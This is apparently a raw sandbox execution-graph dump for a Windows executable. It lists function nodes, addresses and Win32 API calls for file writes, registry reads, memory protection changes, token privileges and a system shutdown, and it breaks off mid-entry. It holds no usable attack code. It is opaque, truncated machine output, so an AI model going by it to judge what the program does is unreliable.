                                                                                        execution_graph 5444 407548 5445 407554 CloseHandle 5444->5445 5446 40755d 5444->5446 5445->5446 6681 402b48 RaiseException 5886 407749 5887 4076dc WriteFile 5886->5887 5893 407724 5886->5893 5888 4076e8 5887->5888 5889 4076ef 5887->5889 5890 40748c 35 API calls 5888->5890 5891 407700 5889->5891 5892 4073ec 34 API calls 5889->5892 5890->5889 5892->5891 5893->5886 5894 4077e0 5893->5894 5895 4078db InterlockedExchange 5894->5895 5897 407890 5894->5897 5896 4078e7 5895->5896 6682 40294a 6683 402952 6682->6683 6684 402967 6683->6684 6685 403554 4 API calls 6683->6685 6685->6683 6686 403f4a 6687 403f53 6686->6687 6688 403f5c 6686->6688 6690 403f07 6687->6690 6693 403f09 6690->6693 6691 403f3c 6691->6688 6695 403e9c 6693->6695 6696 403154 4 API calls 6693->6696 6700 403f3d 6693->6700 6713 403e9c 6693->6713 6694 403ef2 6698 402674 4 API calls 6694->6698 6695->6691 6695->6694 6701 403ea9 6695->6701 6704 403e8e 6695->6704 6696->6693 6703 403ecf 6698->6703 6700->6688 6702 402674 4 API calls 6701->6702 6701->6703 6702->6703 6703->6688 6705 403e4c 6704->6705 6706 403e62 6705->6706 6707 403e7b 6705->6707 6709 403e67 6705->6709 6708 403cc8 4 API calls 6706->6708 6710 402674 4 API calls 6707->6710 6708->6709 6711 403e78 6709->6711 6712 402674 4 API calls 6709->6712 6710->6711 6711->6694 6711->6701 6712->6711 6714 403ed7 6713->6714 6720 403ea9 6713->6720 6715 403ef2 6714->6715 6717 403e8e 4 API calls 6714->6717 6718 402674 4 API calls 6715->6718 6716 403ecf 6716->6693 6719 403ee6 6717->6719 6718->6716 6719->6715 6719->6720 6720->6716 6721 402674 4 API calls 6720->6721 6721->6716 6240 40ac4f 6241 40abc1 6240->6241 6242 4094d8 9 API calls 6241->6242 6244 40abed 6241->6244 6242->6244 6243 40ac06 6245 40ac1a 6243->6245 6246 40ac0f DestroyWindow 6243->6246 6244->6243 6247 40ac00 RemoveDirectoryA 6244->6247 6248 40ac42 6245->6248 6249 40357c 4 API calls 6245->6249 6246->6245 6247->6243 6250 40ac38 6249->6250 6251 4025ac 4 API calls 6250->6251 6251->6248 6252 403a52 6253 403a74 6252->6253 6254 403a5a WriteFile 6252->6254 6254->6253 6255 403a78 GetLastError 6254->6255 6255->6253 6256 402654 6257 403154 4 API calls 6256->6257 6258 402614 6257->6258 6259 402632 6258->6259 6260 403154 4 API calls 6258->6260 6259->6259 6260->6259 6261 40ac56 6262 40ac5d 6261->6262 6264 40ac88 6261->6264 6271 409448 6262->6271 6266 403198 4 API calls 6264->6266 6265 40ac62 6265->6264 6268 40ac80 MessageBoxA 6265->6268 6267 40acc0 6266->6267 6269 403198 4 API calls 6267->6269 6268->6264 6270 40acc8 6269->6270 6272 409454 GetCurrentProcess OpenProcessToken 6271->6272 6273 4094af ExitWindowsEx 6271->6273 6274 409466 6272->6274 6275 40946a LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 6272->6275 6273->6274 6274->6265 6275->6273 6275->6274 6730 40995e 6732 409960 6730->6732 6731 409982 6732->6731 6733 40999e CallWindowProcA 6732->6733 6733->6731 6734 409960 6735 409982 6734->6735 6737 40996f 6734->6737 6736 40999e CallWindowProcA 6736->6735 6737->6735 6737->6736 6738 405160 6739 405173 6738->6739 6740 404e58 33 API calls 6739->6740 6741 405187 6740->6741 6276 402e64 6277 402e69 6276->6277 6278 402e7a RtlUnwind 6277->6278 6279 402e5e 6277->6279 6280 402e9d 6278->6280 5898 40766c SetFilePointer 5899 4076a3 5898->5899 5900 407693 GetLastError 5898->5900 5900->5899 5901 40769c 5900->5901 5902 40748c 35 API calls 5901->5902 5902->5899 6293 40667c IsDBCSLeadByte 6294 406694 6293->6294 6754 403f7d 6755 403fa2 6754->6755 6758 403f84 6754->6758 6757 403e8e 4 API calls 6755->6757 6755->6758 6756 403f8c 6757->6758 6758->6756 6759 402674 4 API calls 6758->6759 6760 403fca 6759->6760 6761 403d02 6767 403d12 6761->6767 6762 403ddf ExitProcess 6763 403db8 6764 403cc8 4 API calls 6763->6764 6766 403dc2 6764->6766 6765 403dea 6768 403cc8 4 API calls 6766->6768 6767->6762 6767->6763 6767->6765 6767->6767 6771 403da4 6767->6771 6772 403d8f MessageBoxA 6767->6772 6769 403dcc 6768->6769 6781 4019dc 6769->6781 6777 403fe4 6771->6777 6772->6763 6773 403dd1 6773->6762 6773->6765 6778 403fe8 6777->6778 6779 403f07 4 API calls 6778->6779 6780 404006 6779->6780 6782 401abb 6781->6782 6783 4019ed 6781->6783 6782->6773 6784 401a04 RtlEnterCriticalSection 6783->6784 6785 401a0e LocalFree 6783->6785 6784->6785 6786 401a41 6785->6786 6787 401a2f VirtualFree 6786->6787 6788 401a49 6786->6788 6787->6786 6789 401a70 LocalFree 6788->6789 6790 401a87 6788->6790 6789->6789 6789->6790 6791 401aa9 RtlDeleteCriticalSection 6790->6791 6792 401a9f RtlLeaveCriticalSection 6790->6792 6791->6773 6792->6791 6299 404206 6300 4041cc 6299->6300 6303 40420a 6299->6303 6301 404282 6302 403154 4 API calls 6304 404323 6302->6304 6303->6301 6303->6302 6305 402c08 6306 402c82 6305->6306 6309 402c19 6305->6309 6307 402c56 RtlUnwind 6308 403154 4 API calls 6307->6308 6308->6306 6309->6306 6309->6307 6312 402b28 6309->6312 6313 402b31 RaiseException 6312->6313 6314 402b47 6312->6314 6313->6314 6314->6307 6315 408c10 6316 408c17 6315->6316 6317 403198 4 API calls 6316->6317 6325 408cb1 6317->6325 6318 408cdc 6319 4031b8 4 API calls 6318->6319 6320 408d69 6319->6320 6321 408cc8 6323 4032fc 18 API calls 6321->6323 6322 403278 18 API calls 6322->6325 6323->6318 6324 4032fc 18 API calls 6324->6325 6325->6318 6325->6321 6325->6322 6325->6324 6330 40a814 6331 40a839 6330->6331 6332 40993c 29 API calls 6331->6332 6335 40a83e 6332->6335 6333 40a891 6364 4026c4 GetSystemTime 6333->6364 6335->6333 6338 408dd8 18 API calls 6335->6338 6336 40a896 6337 409330 46 API calls 6336->6337 6339 40a89e 6337->6339 6340 40a86d 6338->6340 6341 4031e8 18 API calls 6339->6341 6344 40a875 MessageBoxA 6340->6344 6342 40a8ab 6341->6342 6343 406928 19 API calls 6342->6343 6345 40a8b8 6343->6345 6344->6333 6346 40a882 6344->6346 6347 4066c0 19 API calls 6345->6347 6348 405864 19 API calls 6346->6348 6349 40a8c8 6347->6349 6348->6333 6350 406638 19 API calls 6349->6350 6351 40a8d9 6350->6351 6352 403340 18 API calls 6351->6352 6353 40a8e7 6352->6353 6354 4031e8 18 API calls 6353->6354 6355 40a8f7 6354->6355 6356 4074e0 37 API calls 6355->6356 6357 40a936 6356->6357 6358 402594 18 API calls 6357->6358 6359 40a956 6358->6359 6360 407a28 19 API calls 6359->6360 6361 40a998 6360->6361 6362 407cb8 35 API calls 6361->6362 6363 40a9bf 6362->6363 6364->6336 5442 407017 5443 407008 SetErrorMode 5442->5443 6365 403018 6366 403070 6365->6366 6367 403025 6365->6367 6368 40302a RtlUnwind 6367->6368 6369 40304e 6368->6369 6371 402f78 6369->6371 6372 402be8 6369->6372 6373 402bf1 RaiseException 6372->6373 6374 402c04 6372->6374 6373->6374 6374->6366 6379 40901e 6380 409010 6379->6380 6381 408fac Wow64RevertWow64FsRedirection 6380->6381 6382 409018 6381->6382 6383 409020 SetLastError 6384 409029 6383->6384 6399 403a28 ReadFile 6400 403a46 6399->6400 6401 403a49 GetLastError 6399->6401 5903 40762c ReadFile 5904 407663 5903->5904 5905 40764c 5903->5905 5906 407652 GetLastError 5905->5906 5907 40765c 5905->5907 5906->5904 5906->5907 5908 40748c 35 API calls 5907->5908 5908->5904 6803 40712e 6804 407118 6803->6804 6805 403198 4 API calls 6804->6805 6806 407120 6805->6806 6807 403198 4 API calls 6806->6807 6808 407128 6807->6808 5923 40a82f 5924 409ae8 18 API calls 5923->5924 5925 40a834 5924->5925 5926 40a839 5925->5926 5927 402f24 5 API calls 5925->5927 5960 40993c 5926->5960 5927->5926 5929 40a891 5965 4026c4 GetSystemTime 5929->5965 5931 40a83e 5931->5929 6026 408dd8 5931->6026 5932 40a896 5966 409330 5932->5966 5936 40a86d 5940 40a875 MessageBoxA 5936->5940 5937 4031e8 18 API calls 5938 40a8ab 5937->5938 5984 406928 5938->5984 5940->5929 5942 40a882 5940->5942 6029 405864 5942->6029 5947 40a8d9 6011 403340 5947->6011 5949 40a8e7 5950 4031e8 18 API calls 5949->5950 5951 40a8f7 5950->5951 5952 4074e0 37 API calls 5951->5952 5953 40a936 5952->5953 5954 402594 18 API calls 5953->5954 5955 40a956 5954->5955 5956 407a28 19 API calls 5955->5956 5957 40a998 5956->5957 5958 407cb8 35 API calls 5957->5958 5959 40a9bf 5958->5959 6033 40953c 5960->6033 5963 4098cc 19 API calls 5964 40995c 5963->5964 5964->5931 5965->5932 5975 409350 5966->5975 5969 409375 CreateDirectoryA 5970 4093ed 5969->5970 5971 40937f GetLastError 5969->5971 5972 40322c 4 API calls 5970->5972 5971->5975 5973 4093f7 5972->5973 5976 4031b8 4 API calls 5973->5976 5974 408dd8 18 API calls 5974->5975 5975->5969 5975->5974 5977 404c94 33 API calls 5975->5977 5980 407284 19 API calls 5975->5980 5982 408da8 18 API calls 5975->5982 5983 405890 18 API calls 5975->5983 6089 406cf4 5975->6089 6112 409224 5975->6112 5978 409411 5976->5978 5977->5975 5979 4031b8 4 API calls 5978->5979 5981 40941e 5979->5981 5980->5975 5981->5937 5982->5975 5983->5975 6218 406820 5984->6218 5987 403454 18 API calls 5988 40694a 5987->5988 5989 4066c0 5988->5989 6223 4068e4 5989->6223 5992 4066f0 5994 403340 18 API calls 5992->5994 5993 4066fe 5995 403454 18 API calls 5993->5995 5998 4066fc 5994->5998 5996 406711 5995->5996 5997 403340 18 API calls 5996->5997 5997->5998 5999 403198 4 API calls 5998->5999 6000 406733 5999->6000 6001 406638 6000->6001 6002 406642 6001->6002 6003 406665 6001->6003 6229 406950 6002->6229 6004 40322c 4 API calls 6003->6004 6006 40666e 6004->6006 6006->5947 6007 406649 6007->6003 6008 406654 6007->6008 6009 403340 18 API calls 6008->6009 6010 406662 6009->6010 6010->5947 6012 403344 6011->6012 6015 4033a5 6011->6015 6013 40334c 6012->6013 6014 4031e8 6012->6014 6013->6015 6016 40335b 6013->6016 6019 4031e8 18 API calls 6013->6019 6018 403254 18 API calls 6014->6018 6021 4031fc 6014->6021 6020 403254 18 API calls 6016->6020 6017 403228 6017->5949 6018->6021 6019->6016 6023 403375 6020->6023 6021->6017 6022 4025ac 4 API calls 6021->6022 6022->6017 6024 4031e8 18 API calls 6023->6024 6025 4033a1 6024->6025 6025->5949 6027 408da8 18 API calls 6026->6027 6028 408df4 6027->6028 6028->5936 6030 405869 6029->6030 6031 405940 19 API calls 6030->6031 6032 40587b 6031->6032 6032->6032 6040 40955b 6033->6040 6034 409590 6036 40959d GetUserDefaultLangID 6034->6036 6041 409592 6034->6041 6035 409594 6045 407024 GetModuleHandleA GetProcAddress 6035->6045 6036->6041 6039 40956f 6039->5963 6040->6034 6040->6035 6040->6039 6041->6039 6042 4095cb GetACP 6041->6042 6043 4095ef 6041->6043 6042->6039 6042->6041 6043->6039 6044 409615 GetACP 6043->6044 6044->6039 6044->6043 6046 407067 6045->6046 6047 40705e 6045->6047 6048 407070 6046->6048 6049 4070a8 6046->6049 6056 403198 4 API calls 6047->6056 6066 406f68 6048->6066 6050 406f68 RegOpenKeyExA 6049->6050 6054 4070c1 6050->6054 6052 407089 6053 4070de 6052->6053 6069 406f5c 6052->6069 6058 40322c 4 API calls 6053->6058 6054->6053 6057 406f5c 20 API calls 6054->6057 6060 407120 6056->6060 6061 4070d5 RegCloseKey 6057->6061 6062 4070eb 6058->6062 6063 403198 4 API calls 6060->6063 6061->6053 6064 4032fc 18 API calls 6062->6064 6065 407128 6063->6065 6064->6047 6065->6041 6067 406f73 6066->6067 6068 406f79 RegOpenKeyExA 6066->6068 6067->6068 6068->6052 6072 406e10 6069->6072 6073 406e36 RegQueryValueExA 6072->6073 6074 406e59 6073->6074 6079 406e7b 6073->6079 6075 406e73 6074->6075 6074->6079 6080 403278 18 API calls 6074->6080 6081 403420 18 API calls 6074->6081 6077 403198 4 API calls 6075->6077 6076 403198 4 API calls 6078 406f47 RegCloseKey 6076->6078 6077->6079 6078->6053 6079->6076 6080->6074 6082 406eb0 RegQueryValueExA 6081->6082 6082->6073 6083 406ecc 6082->6083 6083->6079 6084 4034f0 18 API calls 6083->6084 6085 406f0e 6084->6085 6086 406f20 6085->6086 6088 403420 18 API calls 6085->6088 6087 4031e8 18 API calls 6086->6087 6087->6079 6088->6086 6131 406a58 6089->6131 6093 406a58 19 API calls 6095 406d36 6093->6095 6094 406d26 6094->6093 6096 406d72 6094->6096 6097 406d42 6095->6097 6099 406a34 21 API calls 6095->6099 6139 406888 6096->6139 6097->6096 6100 406d67 6097->6100 6103 406a58 19 API calls 6097->6103 6099->6097 6100->6096 6151 406cc8 GetWindowsDirectoryA 6100->6151 6105 406d5b 6103->6105 6104 406638 19 API calls 6106 406d87 6104->6106 6105->6100 6107 406a34 21 API calls 6105->6107 6108 40322c 4 API calls 6106->6108 6107->6100 6109 406d91 6108->6109 6110 4031b8 4 API calls 6109->6110 6111 406dab 6110->6111 6111->5975 6113 409244 6112->6113 6114 406638 19 API calls 6113->6114 6115 40925d 6114->6115 6116 40322c 4 API calls 6115->6116 6121 409268 6116->6121 6118 406978 20 API calls 6118->6121 6119 4033b4 18 API calls 6119->6121 6120 408dd8 18 API calls 6120->6121 6121->6118 6121->6119 6121->6120 6122 405890 18 API calls 6121->6122 6124 4092e4 6121->6124 6191 4091b0 6121->6191 6199 409034 6121->6199 6122->6121 6125 40322c 4 API calls 6124->6125 6126 4092ef 6125->6126 6127 4031b8 4 API calls 6126->6127 6128 409309 6127->6128 6129 403198 4 API calls 6128->6129 6130 409311 6129->6130 6130->5975 6132 4034f0 18 API calls 6131->6132 6134 406a6b 6132->6134 6133 406a82 GetEnvironmentVariableA 6133->6134 6135 406a8e 6133->6135 6134->6133 6138 406a95 6134->6138 6153 406dec 6134->6153 6136 403198 4 API calls 6135->6136 6136->6138 6138->6094 6148 406a34 6138->6148 6140 403414 6139->6140 6141 4068ab GetFullPathNameA 6140->6141 6142 4068b7 6141->6142 6143 4068ce 6141->6143 6142->6143 6144 4068bf 6142->6144 6145 40322c 4 API calls 6143->6145 6146 403278 18 API calls 6144->6146 6147 4068cc 6145->6147 6146->6147 6147->6104 6157 4069dc 6148->6157 6152 406ce9 6151->6152 6152->6096 6154 406dfa 6153->6154 6155 4034f0 18 API calls 6154->6155 6156 406e08 6155->6156 6156->6134 6164 406978 6157->6164 6159 4069fe 6160 406a06 GetFileAttributesA 6159->6160 6161 406a1b 6160->6161 6162 403198 4 API calls 6161->6162 6163 406a23 6162->6163 6163->6094 6174 406744 6164->6174 6166 4069b0 6169 4069c6 6166->6169 6170 4069bb 6166->6170 6168 406989 6168->6166 6181 406970 CharPrevA 6168->6181 6182 403454 6169->6182 6171 40322c 4 API calls 6170->6171 6173 4069c4 6171->6173 6173->6159 6178 406755 6174->6178 6175 4067b9 6176 406680 IsDBCSLeadByte 6175->6176 6177 4067b4 6175->6177 6176->6177 6177->6168 6178->6175 6180 406773 6178->6180 6180->6177 6189 406680 IsDBCSLeadByte 6180->6189 6181->6168 6183 403486 6182->6183 6184 403459 6182->6184 6185 403198 4 API calls 6183->6185 6184->6183 6187 40346d 6184->6187 6186 40347c 6185->6186 6186->6173 6188 403278 18 API calls 6187->6188 6188->6186 6190 406694 6189->6190 6190->6180 6192 403198 4 API calls 6191->6192 6194 4091d1 6192->6194 6196 4091fe 6194->6196 6208 4032a8 6194->6208 6211 403494 6194->6211 6197 403198 4 API calls 6196->6197 6198 409213 6197->6198 6198->6121 6200 408f70 2 API calls 6199->6200 6201 40904a 6200->6201 6202 40904e 6201->6202 6215 406a48 6201->6215 6202->6121 6205 409081 6206 408fac Wow64RevertWow64FsRedirection 6205->6206 6207 409089 6206->6207 6207->6121 6209 403278 18 API calls 6208->6209 6210 4032b5 6209->6210 6210->6194 6212 403498 6211->6212 6214 4034c3 6211->6214 6213 4034f0 18 API calls 6212->6213 6213->6214 6214->6194 6216 4069dc 21 API calls 6215->6216 6217 406a52 GetLastError 6216->6217 6217->6205 6219 406744 IsDBCSLeadByte 6218->6219 6221 406835 6219->6221 6220 40687f 6220->5987 6221->6220 6222 406680 IsDBCSLeadByte 6221->6222 6222->6221 6224 4068f3 6223->6224 6225 406820 IsDBCSLeadByte 6224->6225 6227 4068fe 6225->6227 6226 4066ea 6226->5992 6226->5993 6227->6226 6228 406680 IsDBCSLeadByte 6227->6228 6228->6227 6230 406957 6229->6230 6231 40695b 6229->6231 6230->6007 6234 406970 CharPrevA 6231->6234 6233 40696c 6233->6007 6234->6233 6809 408f30 6812 408dfc 6809->6812 6813 408e05 6812->6813 6814 403198 4 API calls 6813->6814 6815 408e13 6813->6815 6814->6813 6816 403932 6817 403924 6816->6817 6818 40374c VariantClear 6817->6818 6819 40392c 6818->6819 5379 4075c4 SetFilePointer 5380 4075f7 5379->5380 5381 4075e7 GetLastError 5379->5381 5381->5380 5382 4075f0 5381->5382 5384 40748c GetLastError 5382->5384 5387 4073ec 5384->5387 5388 407284 19 API calls 5387->5388 5389 407414 5388->5389 5390 407434 5389->5390 5391 405194 33 API calls 5389->5391 5392 405890 18 API calls 5390->5392 5391->5390 5393 407443 5392->5393 5394 403198 4 API calls 5393->5394 5395 407460 5394->5395 5395->5380 6410 4076c8 WriteFile 6411 4076e8 6410->6411 6412 4076ef 6410->6412 6413 40748c 35 API calls 6411->6413 6414 407700 6412->6414 6415 4073ec 34 API calls 6412->6415 6413->6412 6415->6414 6416 402ccc 6419 402cfe 6416->6419 6420 402cdd 6416->6420 6417 402d88 RtlUnwind 6418 403154 4 API calls 6417->6418 6418->6419 6420->6417 6420->6419 6421 402b28 RaiseException 6420->6421 6422 402d7f 6421->6422 6422->6417 6828 403fcd 6829 403f07 4 API calls 6828->6829 6830 403fd6 6829->6830 6831 403e9c 4 API calls 6830->6831 6832 403fe2 6831->6832 6429 4024d0 6430 4024e4 6429->6430 6431 4024e9 6429->6431 6434 401918 4 API calls 6430->6434 6432 402518 6431->6432 6433 40250e RtlEnterCriticalSection 6431->6433 6436 4024ed 6431->6436 6444 402300 6432->6444 6433->6432 6434->6431 6437 402525 6440 402581 6437->6440 6441 402577 RtlLeaveCriticalSection 6437->6441 6439 401fd4 14 API calls 6442 402531 6439->6442 6441->6440 6442->6437 6443 40215c 9 API calls 6442->6443 6443->6437 6445 402314 6444->6445 6447 4023b8 6445->6447 6449 402335 6445->6449 6446 402344 6446->6437 6446->6439 6447->6446 6448 401d80 9 API calls 6447->6448 6452 402455 6447->6452 6454 401e84 6447->6454 6448->6447 6449->6446 6451 401b74 9 API calls 6449->6451 6451->6446 6452->6446 6453 401d00 9 API calls 6452->6453 6453->6446 6459 401768 6454->6459 6456 401ea6 6456->6447 6457 401e99 6457->6456 6458 401dcc 9 API calls 6457->6458 6458->6456 6461 401787 6459->6461 6460 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 6460->6461 6461->6460 6462 40183b 6461->6462 6464 40132c LocalAlloc 6461->6464 6465 401821 6461->6465 6466 4017d6 6461->6466 6463 4015c4 VirtualAlloc 6462->6463 6467 4017e7 6462->6467 6463->6467 6464->6461 6468 40150c VirtualFree 6465->6468 6469 40150c VirtualFree 6466->6469 6467->6457 6468->6467 6469->6467 6470 4028d2 6471 4028da 6470->6471 6472 403554 4 API calls 6471->6472 6473 4028ef 6471->6473 6472->6471 6474 4025ac 4 API calls 6473->6474 6475 4028f4 6474->6475 6833 4019d3 6834 4019ba 6833->6834 6835 4019c3 RtlLeaveCriticalSection 6834->6835 6836 4019cd 6834->6836 6835->6836 5396 407fd4 5397 407fe6 5396->5397 5399 407fed 5396->5399 5407 407f10 5397->5407 5401 408017 5399->5401 5403 408015 5399->5403 5405 408021 5399->5405 5400 40804e 5418 407d7c 5401->5418 5402 407d7c 33 API calls 5402->5400 5421 407e2c 5403->5421 5405->5400 5405->5402 5408 407f25 5407->5408 5409 407f34 5408->5409 5410 407d7c 33 API calls 5408->5410 5411 407f6e 5409->5411 5412 407d7c 33 API calls 5409->5412 5410->5409 5413 407f82 5411->5413 5414 407d7c 33 API calls 5411->5414 5412->5411 5417 407fae 5413->5417 5428 407eb8 5413->5428 5414->5413 5417->5399 5431 4058c4 5418->5431 5420 407d9e 5420->5405 5422 405194 33 API calls 5421->5422 5423 407e57 5422->5423 5439 407de4 5423->5439 5425 407e5f 5426 403198 4 API calls 5425->5426 5427 407e74 5426->5427 5427->5405 5429 407ec7 VirtualFree 5428->5429 5430 407ed9 VirtualAlloc 5428->5430 5429->5430 5430->5417 5433 4058d0 5431->5433 5432 405194 33 API calls 5434 4058fd 5432->5434 5433->5432 5435 4031e8 18 API calls 5434->5435 5436 405908 5435->5436 5437 403198 4 API calls 5436->5437 5438 40591d 5437->5438 5438->5420 5440 4058c4 33 API calls 5439->5440 5441 407e06 5440->5441 5441->5425 6476 405ad4 6477 405adc 6476->6477 6479 405ae4 6476->6479 6478 405aeb 6477->6478 6480 405ae2 6477->6480 6481 405940 19 API calls 6478->6481 6483 405a4c 6480->6483 6481->6479 6484 405a54 6483->6484 6485 405a6e 6484->6485 6486 403154 4 API calls 6484->6486 6487 405a73 6485->6487 6488 405a8a 6485->6488 6486->6484 6490 405940 19 API calls 6487->6490 6489 403154 4 API calls 6488->6489 6492 405a8f 6489->6492 6491 405a86 6490->6491 6494 403154 4 API calls 6491->6494 6493 4059b0 33 API calls 6492->6493 6493->6491 6495 405ab8 6494->6495 6496 403154 4 API calls 6495->6496 6497 405ac6 6496->6497 6497->6479 5909 40a9de 5910 40aa03 5909->5910 5911 407918 InterlockedExchange 5910->5911 5912 40aa2d 5911->5912 5913 409ae8 18 API calls 5912->5913 5914 40aa3d 5912->5914 5913->5914 5919 4076ac SetEndOfFile 5914->5919 5916 40aa59 5917 4025ac 4 API calls 5916->5917 5918 40aa90 5917->5918 5920 4076c3 5919->5920 5921 4076bc 5919->5921 5920->5916 5922 40748c 35 API calls 5921->5922 5922->5920 6840 402be9 RaiseException 6841 402c04 6840->6841 6508 402af2 6509 402afe 6508->6509 6512 402ed0 6509->6512 6513 403154 4 API calls 6512->6513 6515 402ee0 6513->6515 6514 402b03 6515->6514 6517 402b0c 6515->6517 6518 402b25 6517->6518 6519 402b15 RaiseException 6517->6519 6518->6514 6519->6518 5447 40a5f8 5490 4030dc 5447->5490 5449 40a60e 5493 4042e8 5449->5493 5451 40a613 5496 40457c GetModuleHandleA GetProcAddress 5451->5496 5455 40a61d 5504 4065c8 5455->5504 5457 40a622 5513 4090a4 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 5457->5513 5467 40a665 5535 406c2c 5467->5535 5468 4031e8 18 API calls 5469 40a683 5468->5469 5549 4074e0 5469->5549 5475 407918 InterlockedExchange 5478 40a6d2 5475->5478 5476 40a710 5569 4074a0 5476->5569 5478->5476 5606 409ae8 5478->5606 5479 40a751 5573 407a28 5479->5573 5480 40a736 5480->5479 5481 409ae8 18 API calls 5480->5481 5481->5479 5483 40a776 5583 408b08 5483->5583 5487 40a7bc 5488 408b08 35 API calls 5487->5488 5489 40a7f5 5487->5489 5488->5487 5616 403094 5490->5616 5492 4030e1 GetModuleHandleA GetCommandLineA 5492->5449 5494 403154 4 API calls 5493->5494 5495 404323 5493->5495 5494->5495 5495->5451 5497 404598 5496->5497 5498 40459f GetProcAddress 5496->5498 5497->5498 5499 4045b5 GetProcAddress 5498->5499 5500 4045ae 5498->5500 5501 4045c4 SetProcessDEPPolicy 5499->5501 5502 4045c8 5499->5502 5500->5499 5501->5502 5503 404624 6F551CD0 5502->5503 5503->5455 5617 405ca8 5504->5617 5514 4090f7 5513->5514 5701 406fa0 SetErrorMode 5514->5701 5517 407284 19 API calls 5518 409127 5517->5518 5519 403198 4 API calls 5518->5519 5520 40913c 5519->5520 5521 409b78 GetSystemInfo VirtualQuery 5520->5521 5522 409c2c 5521->5522 5525 409ba2 5521->5525 5527 409768 5522->5527 5523 409c0d VirtualQuery 5523->5522 5523->5525 5524 409bcc VirtualProtect 5524->5525 5525->5522 5525->5523 5525->5524 5526 409bfb VirtualProtect 5525->5526 5526->5523 5707 406bd0 GetCommandLineA 5527->5707 5529 409785 5530 409850 5529->5530 5531 406c2c 20 API calls 5529->5531 5534 403454 18 API calls 5529->5534 5532 4031b8 4 API calls 5530->5532 5531->5529 5533 40986a 5532->5533 5533->5467 5599 409c88 5533->5599 5534->5529 5536 406c53 GetModuleFileNameA 5535->5536 5537 406c77 GetCommandLineA 5535->5537 5538 403278 18 API calls 5536->5538 5545 406c7c 5537->5545 5539 406c75 5538->5539 5543 406ca4 5539->5543 5540 406c81 5541 403198 4 API calls 5540->5541 5544 406c89 5541->5544 5542 406af0 18 API calls 5542->5545 5546 403198 4 API calls 5543->5546 5547 40322c 4 API calls 5544->5547 5545->5540 5545->5542 5545->5544 5548 406cb9 5546->5548 5547->5543 5548->5468 5550 4074ea 5549->5550 5714 407576 5550->5714 5717 407578 5550->5717 5551 407516 5552 40752a 5551->5552 5553 40748c 35 API calls 5551->5553 5556 409c34 FindResourceA 5552->5556 5553->5552 5557 409c49 5556->5557 5558 409c4e SizeofResource 5556->5558 5559 409ae8 18 API calls 5557->5559 5560 409c60 LoadResource 5558->5560 5561 409c5b 5558->5561 5559->5558 5563 409c73 LockResource 5560->5563 5564 409c6e 5560->5564 5562 409ae8 18 API calls 5561->5562 5562->5560 5566 409c84 5563->5566 5567 409c7f 5563->5567 5565 409ae8 18 API calls 5564->5565 5565->5563 5566->5475 5566->5478 5568 409ae8 18 API calls 5567->5568 5568->5566 5570 4074b4 5569->5570 5571 4074c4 5570->5571 5572 4073ec 34 API calls 5570->5572 5571->5480 5572->5571 5574 407a35 5573->5574 5575 405890 18 API calls 5574->5575 5576 407a89 5574->5576 5575->5576 5577 407918 InterlockedExchange 5576->5577 5578 407a9b 5577->5578 5579 405890 18 API calls 5578->5579 5580 407ab1 5578->5580 5579->5580 5581 405890 18 API calls 5580->5581 5582 407af4 5580->5582 5581->5582 5582->5483 5592 408b82 5583->5592 5597 408b39 5583->5597 5584 408bcd 5720 407cb8 5584->5720 5585 407cb8 35 API calls 5585->5597 5587 408be4 5590 4031b8 4 API calls 5587->5590 5588 4034f0 18 API calls 5588->5597 5589 4034f0 18 API calls 5589->5592 5593 408bfe 5590->5593 5591 4031e8 18 API calls 5591->5597 5592->5584 5592->5589 5595 403420 18 API calls 5592->5595 5596 4031e8 18 API calls 5592->5596 5598 407cb8 35 API calls 5592->5598 5613 404c20 5593->5613 5594 403420 18 API calls 5594->5597 5595->5592 5596->5592 5597->5585 5597->5588 5597->5591 5597->5592 5597->5594 5598->5592 5600 40322c 4 API calls 5599->5600 5601 409cab 5600->5601 5602 409cba MessageBoxA 5601->5602 5603 409ccf 5602->5603 5604 403198 4 API calls 5603->5604 5605 409cd7 5604->5605 5605->5467 5607 409af1 5606->5607 5608 409b09 5606->5608 5609 405890 18 API calls 5607->5609 5610 405890 18 API calls 5608->5610 5611 409b03 5609->5611 5612 409b1a 5610->5612 5611->5476 5612->5476 5742 402594 5613->5742 5615 404c2b 5615->5487 5616->5492 5618 405940 19 API calls 5617->5618 5619 405cb9 5618->5619 5620 405280 GetSystemDefaultLCID 5619->5620 5623 4052b6 5620->5623 5621 4031e8 18 API calls 5621->5623 5622 404cdc 19 API calls 5622->5623 5623->5621 5623->5622 5624 40520c 19 API calls 5623->5624 5625 405318 5623->5625 5624->5623 5626 404cdc 19 API calls 5625->5626 5627 40520c 19 API calls 5625->5627 5628 4031e8 18 API calls 5625->5628 5629 40539b 5625->5629 5626->5625 5627->5625 5628->5625 5630 4031b8 4 API calls 5629->5630 5631 4053b5 5630->5631 5632 4053c4 GetSystemDefaultLCID 5631->5632 5689 40520c GetLocaleInfoA 5632->5689 5635 4031e8 18 API calls 5636 405404 5635->5636 5637 40520c 19 API calls 5636->5637 5638 405419 5637->5638 5639 40520c 19 API calls 5638->5639 5640 40543d 5639->5640 5695 405258 GetLocaleInfoA 5640->5695 5643 405258 GetLocaleInfoA 5644 40546d 5643->5644 5645 40520c 19 API calls 5644->5645 5646 405487 5645->5646 5647 405258 GetLocaleInfoA 5646->5647 5648 4054a4 5647->5648 5649 40520c 19 API calls 5648->5649 5650 4054be 5649->5650 5651 4031e8 18 API calls 5650->5651 5652 4054cb 5651->5652 5653 40520c 19 API calls 5652->5653 5654 4054e0 5653->5654 5655 4031e8 18 API calls 5654->5655 5656 4054ed 5655->5656 5657 405258 GetLocaleInfoA 5656->5657 5658 4054fb 5657->5658 5659 40520c 19 API calls 5658->5659 5660 405515 5659->5660 5661 4031e8 18 API calls 5660->5661 5662 405522 5661->5662 5663 40520c 19 API calls 5662->5663 5664 405537 5663->5664 5665 4031e8 18 API calls 5664->5665 5666 405544 5665->5666 5667 40520c 19 API calls 5666->5667 5668 405559 5667->5668 5669 405576 5668->5669 5670 405567 5668->5670 5672 40322c 4 API calls 5669->5672 5697 40322c 5670->5697 5673 405574 5672->5673 5674 40520c 19 API calls 5673->5674 5675 405598 5674->5675 5676 4055b5 5675->5676 5677 4055a6 5675->5677 5679 403198 4 API calls 5676->5679 5678 40322c 4 API calls 5677->5678 5680 4055b3 5678->5680 5679->5680 5681 4033b4 18 API calls 5680->5681 5682 4055d7 5681->5682 5683 4033b4 18 API calls 5682->5683 5684 4055f1 5683->5684 5685 4031b8 4 API calls 